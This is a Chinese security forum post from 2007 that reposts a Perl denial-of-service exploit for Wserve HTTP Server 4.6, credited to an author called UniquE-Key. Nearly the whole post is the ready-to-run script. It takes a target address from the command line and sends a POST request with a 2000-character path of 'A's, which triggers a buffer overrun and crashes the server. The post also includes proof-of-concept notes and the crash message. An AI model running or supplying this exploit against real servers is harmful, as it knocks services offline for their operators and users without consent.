‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3923 
精华
128 
积分
209640 
阅读权限
200 
性别
男 
在线时间
1096 小时 
注册时间
2007-10-23 
最后登录
2008-7-20 

资料收集奖 运营支持奖

楼主 发表于 2007-4-15 00:52  只看该作者

Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit

复制内容到剪贴板
代码:
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# [url]http://sourceforge.net/projects/whttp[/url]
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000].
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# [url]http://www.UniquE-Key.Org[/url]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题